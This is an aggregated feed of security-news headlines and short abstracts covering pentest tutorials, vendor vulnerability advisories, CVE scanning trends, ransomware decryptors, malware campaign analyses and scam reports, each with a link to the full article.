Penetration Testing on MYSQL (Port 3306)
MySQL is an open-source Relational Database Management System (RDBMS). It is widely used for managing and organizing data in a structured format, using tables to The post Penetration Testing on MYSQL (Port 3306) appeared first on Hacking Articles.
https://www.hackingarticles.in/penetration-testing-on-mysql-port-3306/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Are Scrapers and Why Should You Care?
Data miners and scraper bots are everywhere, feeding AI LLMs and more, and many of them are NOT harmless.
https://www.f5.com/labs/articles/threat-intelligence/what-are-scrapers-and-why-should-you-care
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Configure GitHub Artifact Attestations for secure cloud-native delivery
Introducing the generally available capability of GitHub Artifact Attestations to secure your cloud-native supply chain packages and images. The post Configure GitHub Artifact Attestations for secure cloud-native delivery appeared first on The GitHub Blog.
https://github.blog/security/supply-chain-security/configure-github-artifact-attestations-for-secure-cloud-native-delivery/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Huge Increase in Scanning for CVE-2017-9841 With Large Variability in Scanning Infrastructure
The rather old CVE-2017-9841, an RCE in PHPUnit, suddenly jumps to the top of our list, with an increase of nearly 400% since last month. We dig into the scanning infrastructure.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-june-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Issue with AWS Client VPN - CVE-2024-30164, CVE-2024-30165
Publication Date: 2024/07/16 3:30 PM PDT AWS is aware of CVE-2024-30164 and CVE-2024-30165 in AWS Client VPN. These issues could potentially allow an actor with access to an end user's device to escalate to root privilege and execute arbitrary commands on that device. We addressed these issues on all platforms. Customers using AWS Client VPN should upgrade to version 3.11.1 or higher for Windows, 3.9.2 or higher for MacOS, and 3.12.1 or higher for Linux. For additional information on configuring AWS Client VPN to meet your security and compliance requirements, please refer to our "Security in AWS Client VPN" user guide. We would like to thank Robinhood for collaborating on this issue through the coordinated vulnerability disclosure process. Security-related questions...
https://aws.amazon.com/security/security-bulletins/AWS-2024-008/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Issue with PyTorch TorchServe - CVE-2024-35198, CVE-2024-35199
Publication Date: 2024/07/18 2:50 PM PDT AWS is aware of the issues described in CVE-2024-35198 and CVE-2024-35199 in PyTorch TorchServe versions 0.3.0 to 0.10.0. Customers using PyTorch inference Deep Learning Containers (DLC) through Amazon SageMaker are not affected. CVE-2024-35198 does not prevent a model from being downloaded into the model store if the URL contains characters such as ".." when TorchServe model registration API is called. Customers using PyTorch inference Deep Learning Containers (DLC) through Amazon SageMaker and Amazon Elastic Kubernetes Service (Amazon EKS) are not affected by this issue. CVE-2024-35199 does not bind two gRPC ports 7070 and 7071 to localhost by default. These two interfaces are bound to all interfaces when TorchServe is natively launched...
https://aws.amazon.com/security/security-bulletins/AWS-2024-009/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

3 ways to get Remote Code Execution in Kafka UI
In this blog post, we'll explain how we discovered three critical vulnerabilities in Kafka UI and how they can be exploited. The post 3 ways to get Remote Code Execution in Kafka UI appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/3-ways-to-get-remote-code-execution-in-kafka-ui/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

File Transfer Cheatsheet: Windows and Linux
File transfer is a crucial step in the post-exploitation scenario while performing penetration testing or red teaming. There are various ways to do the file The post File Transfer Cheatsheet: Windows and Linux appeared first on Hacking Articles.
https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

2024 DDoS Attack Trends
Unveiling the rise of Hacktivism in a tense global climate.
https://www.f5.com/labs/articles/threat-intelligence/2024-ddos-attack-trends
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

WinRM Penetration Testing
Windows Remote Management (WinRM) is a protocol developed by Microsoft for remotely managing hardware and operating systems on Windows machines. It is a component of The post WinRM Penetration Testing appeared first on Hacking Articles.
https://www.hackingarticles.in/winrm-penetration-testing/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How insecure is Avast Secure Browser?
A while ago I already looked into Avast Secure Browser. Back then it didn't end well for Avast: I found critical vulnerabilities allowing arbitrary websites to infect user's computer. Worse yet: much of it was due to neglect of secure coding practices, existing security mechanisms were disabled for no good reason. I didn't finish that investigation because I discovered that the browser was essentially spyware, collecting your browsing history and selling it via Avast's Jumpshot subsidiary. But that was almost five years ago. After an initial phase of denial, Avast decided to apologize and to wind down Jumpshot. It was certainly a mere coincidence that Avast was subsequently sold to NortonLifeLock, called Gen Digital today. Yes, Avast is truly reformed and paying for their crimes in...
https://palant.info/2024/07/15/how-insecure-is-avast-secure-browser/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Unauthorized Access to AWS Account Findings in Microsoft Defender for Cloud
Microsoft Defender for Cloud at one point provided customers with a flawed configuration template through their public GitHub repository. This template creates resources in the customer's AWS account so that Microsoft Defender for Cloud can scan it. In the rare cases in which this template was deployed, under certain, limited circumstances, Defender for Cloud's security findings for these AWS accounts could be disclosed to unauthorized third parties.
https://www.cloudvulndb.org/mdc-aws-findings-disclosure
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Deep Dive on Supplement Scams: How AI Drives ‘Miracle Cures' and Sponsored Health-Related Scams on Social Media
Sponsored social media content has become increasingly present on feeds. Sponsored ads can often be beneficial as they are customized to suit online personas, offering relevant content tailored specifically for you. While personalized ads can help enhance your online experience, not all are legitimate. In fact, scams originating from phony ads on social media have increased dramatically, with potentially severe consequences for consumers. Sponsored supplement scams on social media platforms
https://www.bitdefender.com/en-us/blog/labs/deep-dive-on-supplement-scams-how-ai-drives-miracle-cures-and-sponsored-health-related-scams-on-social-media/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

OpenSSH regreSSHion Attack (CVE-2024-6387)
CVE-2024-6387A signal handler race condition was found in OpenSSH's server (sshd), where a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). This could lead to remote code execution with root privileges. Revised on 2024-11-20 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-258
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Decrypted: DoNex Ransomware and its Predecessors
Researchers from Avast have discovered a flaw in the cryptographic schema of the DoNex ransomware and its predecessors. In cooperation with law enforcement organizations, we have been silently providing the decryptor to DoNex ransomware victims since March 2024. The  cryptographic weakness was made public at Recon 2024 and therefore we have no reason to keep […] The post Decrypted: DoNex Ransomware and its Predecessors appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/decrypted-donex-ransomware-and-its-predecessors/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-donex-ransomware-and-its-predecessors
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

MSSQL for Pentester: Command Execution with xp_cmdshell
Transact-SQL (T-SQL) is an extension of the SQL language used primarily in Microsoft SQL Server. T-SQL expands the functionality of SQL by adding procedural programming The post MSSQL for Pentester: Command Execution with xp_cmdshell appeared first on Hacking Articles.
https://www.hackingarticles.in/mssql-for-pentester-command-execution-with-xp_cmdshell/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

SAML Raider Release 2.0.0
SAML Raider is a Burp Suite extension and the tool of choice for many pentesters for testing SAML infrastructures. This blog post should give a brief introduction to what has changed in the new version 2.0.0. From Improving developer and user experience to bug fixes.
https://blog.compass-security.com/2024/07/saml-raider-release-2-0-0/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Windows Registry Adventure #3: Learning resources
Posted by Mateusz Jurczyk, Google Project Zero When tackling a new vulnerability research target, especially a closed-source one, I prioritize gathering as much information about it as possible. This gets especially interesting when it's a subsystem as old and fundamental as the Windows registry. In that case, tidbits of valuable data can lurk in forgotten documentation, out-of-print books, and dusty open-source code – each potentially offering a critical piece of the puzzle. Uncovering them takes some effort, but the payoff is often immense. Scraps of information can contain hints as to how certain parts of the software are implemented, as well as why – what were ...
https://googleprojectzero.blogspot.com/2024/06/the-windows-registry-adventure-3.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Attack of the clones: Getting RCE in Chrome's renderer with duplicate object properties
In this post, I'll exploit CVE-2024-3833, an object corruption bug in v8, the Javascript engine of Chrome, that allows remote code execution (RCE) in the renderer sandbox of Chrome by a single visit to a malicious site. The post Attack of the clones: Getting RCE in Chrome's renderer with duplicate object properties appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/attack-of-the-clones-getting-rce-in-chromes-renderer-with-duplicate-object-properties/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ashok - A OSINT Recon Tool, A.K.A Swiss Army Knife
Reconnaissance is the first phase of penetration testing which means gathering information before any real attacks are planned So Ashok is an Incredible fast recon tool for penetration tester which is specially designed for Reconnaissance" title="Reconnaissance">Reconnaissance phase. And in Ashok-v1.1 you can find the advanced google dorker and wayback crawling machine. Main Features - Wayback Crawler Machine- Google Dorking without limits- Github Information Grabbing- Subdomain Identifier - Cms/Technology Detector With Custom Headers Installation ~> git clone https://github.com/ankitdobhal/Ashok~> cd Ashok~> python3.7 -m pip3 install -r requirements.txt How to use Ashok? A detailed usage guide is available on Usage section of the Wiki. But Some index of options is given below:...
http://www.kitploit.com/2024/06/ashok-osint-recon-tool-aka-swiss-army.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Scanning for TP-Link Wifi Router Vulnerability Increases by 100%
The TP-Link Archer AX21 Wifi Router vulnerability CVE-2023-1389 experiences massive targeting along with a rather old critical RCE in PHPUnit.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-may-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models
Posted by Sergei Glazunov and Mark Brand, Google Project Zero IntroductionAt Project Zero, we constantly seek to expand the scope and effectiveness of our vulnerability research. Though much of our work still relies on traditional methods like manual source code audits and reverse engineering, we're always looking for new approaches. As the code comprehension and general reasoning ability of Large Language Models (LLMs) has improved, we have been exploring how these models can reproduce the systematic approach of a human security researcher when identifying and demonstrating security vulnerabilities. We hope that in the future, this can close some of the blind spots of current automated vulnerability discovery approaches, and enable automated detection of "unfuzzable" vulnerabilities. ...
https://googleprojectzero.blogspot.com/2024/06/project-naptime.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Execute commands by sending JSON? Learn how unsafe deserialization vulnerabilities work in Ruby projects
Can an attacker execute arbitrary commands on a remote server just by sending JSON? Yes, if the running code contains unsafe deserialization vulnerabilities. But how is that possible? In this blog post, we'll describe how unsafe deserialization vulnerabilities work and how you can detect them in Ruby projects. The post Execute commands by sending JSON? Learn how unsafe deserialization vulnerabilities work in Ruby projects appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/execute-commands-by-sending-json-learn-how-unsafe-deserialization-vulnerabilities-work-in-ruby-projects/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New Diamorphine rootkit variant seen undetected in the wild
Introduction Code reuse is very frequent in malware, especially for those parts of the sample that are complex to develop or hard to write with an essentially different alternative code. By tracking both source code and object code, we efficiently detect new malware and track the evolution of existing malware in-the-wild.  Diamorphine is a well-known […] The post New Diamorphine rootkit variant seen undetected in the wild appeared first on Avast Threat Labs.
https://decoded.avast.io/davidalvarez/new-diamorphine-rootkit-variant-seen-undetected-in-the-wild/?utm_source=rss&utm_medium=rss&utm_campaign=new-diamorphine-rootkit-variant-seen-undetected-in-the-wild
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Introducing Conkeyscan – Confluence Keyword Scanner
TL;DR Release of Conkeyscan – A Confluence Keyword/Secret Scanner, which is tailored towards pentesters. Secrets Everywhere Many companies, especially larger ones, need to store knowledge in a centralized way. A wiki is the usual choice for this. One product that is frequently used for this purpose is Confluence from Atlassian. Similar to how sensitive data […]
https://blog.compass-security.com/2024/06/introducing-conkeyscan-confluence-keyword-scanner/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Azure Machine Learning SSRF

https://www.cloudvulndb.org/azure-ml-ssrf-pt
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

GCP HMAC Keys do not log creation, deletion or usage
Cloud Audit Logs do not capture actions mediated through the cloud console private API service (cloudconsole-pa). Consequently, there is no logging of HMAC key creation or deletion linked to user accounts. This absence of logs hampers defenders' ability to alert or monitor the creation of HMAC keys for user accounts, posing a persistence risk, or their deletion, presenting a denial of service risk.
https://www.cloudvulndb.org/gcp-hmac-keys-insufficient-logging
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

GCP HMAC Keys are not discoverable or revokable other than for self
GCP administrators face challenges in managing HMAC keys within their organizations, lacking visibility into which user accounts have generated these keys and whether they are actively being used to access storage objects. Additionally, there's a lack of functionality to revoke keys associated with other users, restricting their ability to enforce security policies effectively. Similarly, GCP incident response teams rely on Cloud Logging to monitor Cloud Storage object access, but they lack specific indicators to determine if HMAC keys are being utilized in these access attempts.
https://www.cloudvulndb.org/gcp-hmac-keys-unauditable
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Driving forward in Android drivers
Posted by Seth Jenkins, Google Project ZeroIntroduction Android's open-source ecosystem has led to an incredible diversity of manufacturers and vendors developing software that runs on a broad variety of hardware. This hardware requires supporting drivers, meaning that many different codebases carry the potential to compromise a significant segment of Android phones. There are recent public examples of third-party drivers containing serious vulnerabilities that are exploited on Android. While there exists a well-established body of public (and In-the-Wild) security research on Android GPU drivers, other chipset components may not be as frequently audited so this research sought to explore those drivers in greater detail.Driver Enumeration: Not as Easy as it Looks This...
https://googleprojectzero.blogspot.com/2024/06/driving-forward-in-android-drivers.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

10 years of the GitHub Security Bug Bounty Program
Let's take a look at 10 key moments from the first decade of the GitHub Security Bug Bounty program. The post 10 years of the GitHub Security Bug Bounty Program appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/10-years-of-the-github-security-bug-bounty-program/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Blockchain / Smart Contract Bugs
To identify and understand threats and weaknesses of smart contracts, it is important to be at least familiar with common smart contract bugs and vulnerabilities, how they can be leveraged by a malicious attacker, and how these issues can be mitigated. This blog article aims to raise awareness about common smart contract vulnerabilities and their corresponding mitigation strategies.
https://blog.compass-security.com/2024/06/blockchain-smart-contract-bugs/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Unfading Sea Haze: New Espionage Campaign in the South China Sea
Bitdefender researchers investigated a series of incidents at high-level organizations in countries of the South China Sea region, all performed by the same  threat actor we track as Unfading Sea Haze. Based on the victimology and the cyber-attack's aim, we believe the threat actor is aligned with China's interests. As tensions in the region rise, they are reflected in the intensification of activity on behalf of the Unfading Sea Haze actor, which uses new and improved tools and TTPs. We notice
https://www.bitdefender.com/en-us/blog/labs/unfading-sea-haze-new-espionage-campaign-in-the-south-china-sea/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Building DDoS Botnets with TP-Link and Netgear Routers
Threat actors double down with their botnet building efforts. Vulnerable Netgear routers join exploitable TP-Link and other IoT devices, expanding attacker DDoS capabilities.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-april-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to become a Hacker
Introduction Last year, I attended a job fair organized by the Association of Computer Science Students at ETH Zürich. It was a rewarding experience to be able to share my day-to-day work in a field I am so passionate about. We got to talk to numerous students at different stages of their studies, as well […]
https://blog.compass-security.com/2024/05/how-to-become-a-hacker/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Internal Azure Container Registry writable via exposed secret
A Microsoft employee accidentally published credentials via a git commit to a public repository. These credentials granted privileged access to an internal Azure Container Registry (ACR) used by Azure, which reportedly held container images utilized by multiple Azure projects, including Azure IoT Edge, Akri, and Apollo. The privileged access could have allowed an attacker to download private images as well as upload new images and (most importantly) overwrite existing ones. In theory, an attacker could have leveraged the latter to implement a supply chain attack against these Azure projects and their users. However, it is currently unknown precisely which images this ACR contained or how they were used, so the effective impact of this issue remains undetermined.
https://www.cloudvulndb.org/azure-internal-acr-secret
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Notes on ThroughTek Kalay Vulnerabilities and Their Impact on the IoT Ecosystem
Since 2014, Bitdefender IoT researchers have been looking into the world's most popular IoT devices, hunting for vulnerabilities and undocumented attack avenues. This report documents four vulnerabilities affecting devices powered by the ThroughTek Kalay Platform. Due to the platform's massive presence in IoT integrations, these flaws have a significant downstream impact on several vendors. In the interconnected landscape of the Internet of Things (IoT), the reliability and security of devices,
https://www.bitdefender.com/en-us/blog/labs/notes-on-throughtek-kalay-vulnerabilities-and-their-impact/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Avast Q1/2024 Threat Report
Nearly 90% of Threats Blocked are Social Engineering, Revealing a Huge Surge of Scams, and Discovery of the Lazarus APT Campaign The post Avast Q1/2024 Threat Report appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/avast-q1-2024-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=avast-q1-2024-threat-report
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.4.0 release candidate now available!
The ClamAV 1.4.0 release candidate is now available.You may find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page.Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.4.0-rc.tar.gz" does not require an internet connection to build. All dependencies are included in this package.  But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies.For Docker users, there is no specific Docker tag for the release candidate, but you can use the clamav:unstable or clamav:unstable_base tags.The release candidate phase is expected...
http://blog.clamav.net/2024/05/clamav-140-release-candidate-now.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Where does your software (really) come from?
GitHub is working with the OSS community to bring new supply chain security capabilities to the platform. The post Where does your software (really) come from? appeared first on The GitHub Blog.
https://github.blog/security/supply-chain-security/where-does-your-software-really-come-from/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Sensor Intel Series: Top CVEs in March 2024
TP-Link Archer AX21 Wifi Router targeting, plus a handful of new CVEs! See what mass scanning looks like in March 2024.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-march-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CodeQL zero to hero part 3: Security research with CodeQL
Learn how to use CodeQL for security research and improve your security research workflow. The post CodeQL zero to hero part 3: Security research with CodeQL appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/codeql-zero-to-hero-part-3-security-research-with-codeql/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining
Avast discovered and analyzed GuptiMiner, a malware campaign hijacking an eScan antivirus update mechanism to distribute backdoors and coinminers. The post GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining appeared first on Avast Threat Labs.
https://decoded.avast.io/janrubin/guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining/?utm_source=rss&utm_medium=rss&utm_campaign=guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Windows Registry Adventure #2: A brief history of the feature
Posted by Mateusz Jurczyk, Google Project Zero Before diving into the low-level security aspects of the registry, it is important to understand its role in the operating system and a bit of history behind it. In essence, the registry is a hierarchical database made of named "keys" and "values", used by Windows and applications to store a variety of settings and configuration data. It is represented by a tree structure, in which keys may have one or more sub-keys, and every subkey is associated with exactly one parent key. Furthermore, every key may also contain one or more values, which have a type (integer, string, binary blob etc.) and are used to store actual data in the registry. Every key can be uniquely identified by its name and the names of all of its ascendants...
https://googleprojectzero.blogspot.com/2024/04/the-windows-registry-adventure-2.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Windows Registry Adventure #1: Introduction and research results
Posted by Mateusz Jurczyk, Google Project Zero In the 20-month period between May 2022 and December 2023, I thoroughly audited the Windows Registry in search of local privilege escalation bugs. It all started unexpectedly: I was in the process of developing a coverage-based Windows kernel fuzzer based on the Bochs x86 emulator (one of my favorite tools for security research: see Bochspwn, Bochspwn Reloaded, and my earlier font fuzzing infrastructure), and needed some binary formats to test it on. My first pick were PE files: they are very popular in the Windows environment, which makes it easy to create an initial corpus of input samples, and a basic fuzzing harness is equally easy to develop with just a single GetFileVersionInfoSizeW API call. The test was successful: even though...
https://googleprojectzero.blogspot.com/2024/04/the-windows-registry-adventure-1.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams
Key Points Introduction In the summer of 2023, Avast identified a campaign targeting specific individuals in the Asian region through fabricated job offers. The motivation behind the attack remains uncertain, but judging from the low frequency of attacks, it appears that the attacker had a special interest in individuals with technical backgrounds. This sophistication is […] The post From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams appeared first on Avast Threat Labs.
https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/?utm_source=rss&utm_medium=rss&utm_campaign=from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.3.1, 1.2.3, 1.0.6 patch versions published
Today, we are publishing the 1.3.1, 1.2.3, and 1.0.6 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub.The images on Docker Hub may not be immediately available on release day.Continue reading to learn what changed in each version.1.3.1ClamAV 1.3.1 is a critical patch release with the following fixes:CVE-2024-20380: Fixed a possible crash in the HTML file parser that could cause a denial-of-service (DoS) condition.This issue affects version 1.3.0 only and does not affect prior versions.Thank you to Błażej Pawłowski for identifying this issue.GitHub pull requestUpdated select Rust dependencies to the latest versions. This resolved Cargo audit complaints and included...
http://blog.clamav.net/2024/04/clamav-131-123-106-patch-versions.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CVE-2024-28056
Publication Date: 2024/04/15 07:00 AM PST AWS is aware of CVE-2024-28056, which affects Amplify CLI versions prior to 12.10.1 and Amplify Studio, which uses Amplify CLI. We released a fix to Amplify CLI on January 10, 2024 that also fixed Amplify Studio, and recommend customers upgrade to Amplify CLI 12.10.1 or higher to address this issue. We have proactively communicated with the customers using affected versions. AWS has taken two additional steps to protect customers using Amplify from unintentional misconfigurations. First, AWS added a mitigation to the AWS Security Token Service (STS) where attempts to make a cross-account role assumption with a trust policy referencing Amazon Cognito as the trusted principal, without conditions to scope down access to specific Amazon Cognito...
https://aws.amazon.com/security/security-bulletins/AWS-2024-003/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Vulnerabilities Identified in LG WebOS
As the creator of the world's first smart home cybersecurity hub, Bitdefender regularly audits popular IoT hardware for vulnerabilities. This research paper is part of a broader program that aims to shed light on the security of the world's best-sellers in the IoT space. This report covers vulnerabilities discovered while researching the LG WebOS TV operating system. We have found several issues affecting WebOS versions 4 through 7 running on LG TVs. These vulnerabilities let us gain root acces
https://www.bitdefender.com/en-us/blog/labs/vulnerabilities-identified-in-lg-webos/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AI meets next-gen info stealers in social media malvertising campaigns
The impact that AI has on society has steadily crept into the darkest nooks and crannies of the internet. So much so that cybercrooks are hitching free rides on the AI bandwagon by leveraging the increased demand of AI-powered software for content creators. Cybercriminal groups constantly adapt their operating methods and tools to stay a step ahead of potential victims. Highly focused on enhancing their deceptive practices, threat actors have, unfortunately, found a most reliable and powerful a
https://www.bitdefender.com/en-us/blog/labs/ai-meets-next-gen-info-stealers-in-social-media-malvertising-campaigns/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CVE-2024-3094
Publication Date: 2024/03/29 12:30 PM PST CVE Identifier: CVE-2024-3094 AWS is aware of CVE-2024-3094, which affects versions 5.6.0 and 5.6.1 of the xz-utils package. This issue may attempt to introduce security issues in openssh through the use of liblzma within some operating system environments. Amazon Linux customers are not affected by this issue, and no action is required. AWS infrastructure and services do not utilize the affected software and are not impacted. Users of Bottlerocket are not affected. Customers using other operating systems are advised to refer to information provided by the OS vendor to address any concerns originating from this reported issue. Security-related questions or concerns can be brought to our attention via aws-security@amazon.com.
https://aws.amazon.com/security/security-bulletins/AWS-2024-002/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Sensor Intel Series: Top CVEs in February 2024
27 new CVEs, and continued IoT targeting. See what's new from February 2024.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-february-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Numerous vulnerabilities in Xunlei Accelerator application
Xunlei Accelerator (迅雷客户端) a.k.a. Xunlei Thunder by the China-based Xunlei Ltd. is a wildly popular application. According to the company's annual report 51.1 million active users were counted in December 2022. The company's Google Chrome extension 迅雷下载支持, while not mandatory for using the application, had 28 million users at the time of writing. I've found this application to expose a massive attack surface. This attack surface is largely accessible to arbitrary websites that an application user happens to be visiting. Some of it can also be accessed from other computers in the same network or by attackers with the ability to intercept user's network connections (Man-in-the-Middle attack). It does not appear like security concerns were considered in the design...
https://palant.info/2024/03/06/numerous-vulnerabilities-in-xunlei-accelerator-application/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Sponsored Ad Fraud: Mystery Box Scams Flood Social Media
Social media platforms are overflowing with scams. In the past couple of months, Bitdefender Labs has been monitoring a steep increase in fraudulent social media ads on Facebook promoting various swindles ranging from crypto-doubling to AI-generated celebrity-endorsed giveaways. Our latest analysis has spotted a consistent trend, with fraudsters continuing to exploit Meta's ad system to deceive consumers. The hustle? A long-established ruse that involves peddling so-called mystery boxes from
https://www.bitdefender.com/en-us/blog/labs/sponsored-ad-fraud-mystery-box-scams-flood-social-media/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day
The Lazarus Group is back with an upgraded variant of their FudModule rootkit, this time enabled by a zero-day admin-to-kernel vulnerability for CVE-2024-21338. Read this blog for a detailed analysis of this rootkit variant and learn more about several new techniques, including a handle table entry manipulation technique that directly targets Microsoft Defender, CrowdStrike Falcon, and HitmanPro. The post Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day appeared first on Avast Threat Labs.
https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/?utm_source=rss&utm_medium=rss&utm_campaign=lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

When Stealers Converge: New Variant of Atomic Stealer in the Wild
Here at Bitdefender, we're constantly working on improving detection capabilities for our macOS cyber-security products; part of this effort involves revisiting old (or digging up new) samples from our malware zoo. During routine verifications, we were able to isolate multiple suspicious and undetected macOS disk image files surprisingly small for files of this kind (1.3 MB per file). A short look into the code revealed that these files are significantly similar to other samples analysed in the
https://www.bitdefender.com/en-us/blog/labs/when-stealers-converge-new-variant-of-atomic-stealer-in-the-wild/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Details on Apple's Shortcuts Vulnerability: A Deep Dive into CVE-2024-23204
CVE-2024-23204 sheds light on the critical importance of continuous security vigilance. Apple's Shortcuts application, designed to enhance user automation, can inadvertently become a potential vector for privacy breaches. This analysis aims to provide users, developers, and security professionals with insights into the nature of the vulnerability, its potential impact, and recommended mitigation measures. At a glance: * We have discovered a vulnerability in Apple Shortcuts that lets a potent
https://www.bitdefender.com/en-us/blog/labs/details-on-apples-shortcuts-vulnerability-a-deep-dive-into-cve-2024-23204/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Decrypted: HomuWitch Ransomware
HomuWitch is a ransomware strain that initially emerged in July 2023. Unlike the majority of current ransomware strains, HomuWitch targets end-users - individuals - rather than institutions and companies. The post Decrypted: HomuWitch Ransomware appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/decrypted-homuwitch-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-homuwitch-ransomware
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Audio deepfakes: Celebrity-endorsed giveaway scams and fraudulent investment opportunities flood social media platforms
Bitdefender Labs has been keeping up with the latest modus operandi of cybercrooks who adapt emerging technologies to siphon money from consumers. Artificial intelligence is just one of the many tools that help in the creation and successful dissemination of online schemes to extort money and sensitive information. This paper focuses on voice cloning (audio deepfakes) schemes and how they are proliferated via social media to trick unsuspecting victims. Before delving deeper into the main subj
https://www.bitdefender.com/en-us/blog/labs/audio-deepfakes-celebrity-endorsed-giveaway-scams-and-fraudulent-investment-opportunities-flood-social-media-platforms/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Decrypted: Rhysida Ransomware
The team at Avast has developed a decryptor for the Rhysida ransomware and released it for public download. The Rhysida ransomware has been active since May 2023. As of Feb 2024, their TOR site lists 78 attacked companies, including IT (Information Technology) sector, healthcare, universities, and government organizations. The post Decrypted: Rhysida Ransomware appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/decrypted-rhysida-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-rhysida-ransomware
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bypassing EDRs With EDR-Preloading
Evading user mode EDR hooks by hijacking the AppVerifier layer
https://malwaretech.com/2024/02/bypassing-edrs-with-edr-preload.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ClamAV 1.3.0 feature release and 1.2.2, 1.0.5 security patch release!
